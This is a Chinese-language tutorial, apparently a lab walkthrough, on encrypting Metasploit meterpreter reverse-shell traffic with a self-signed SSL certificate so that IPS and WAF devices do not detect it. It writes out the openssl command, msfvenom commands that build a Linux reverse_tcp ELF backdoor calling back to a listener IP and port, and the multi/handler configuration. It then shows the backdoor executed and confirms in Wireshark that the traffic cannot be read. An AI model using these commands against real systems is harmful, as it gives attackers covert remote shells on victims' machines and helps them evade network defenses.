1、背景介绍
在MSF中生成shell,并上线运行时。都是通过`http` `https` `tcp`等协议传输。虽然MSF本身会对流量进行加密,但MSF太出名以致于其加密特征容易被IPS,WAF等可以检测带有攻击的特征的设备拦截或记录。
2、生成 SSL 证书
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
3、使用 MSF 生成带证书的后门
针对不同版本 msf 的不同命令
其中 lhost 为本机 IP,mshell.elf 为生成的文件名
msf5:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.249.132 LPORT=8888 -f elf > mshell.elf
msf6:
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.249.132 LPORT=8888 -f elf > mshell.elf
我这里是 msf6
使用 ls 命令查前面生成的相应证书和文件
4、配置带证书的 MSF 后门监听
启动MSF
msfdb run
选择攻击载荷
use exploit/multi/handler
设置payload、监听IP、端口以及证书
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.249.132
set lport 8888
set HandlerSSLCert /home/kali/key.pem
开启监听
exploit
5、meterpreter 会话建立与 shell 命令执行
将 mshell.elf 放到另一台 kali
对该文件加权后执行
chmod u+x mshell.elf
./mshell.elf
可以发现连接建立成功并且可以执行 shell 命令
6、使用wireshark抓包进行流量验证
开启wireshark抓取eth0
执行ifconfig
分析数据包,看不出任何与ifconfig有关的信息
包括响应包的内容,也是被加密了的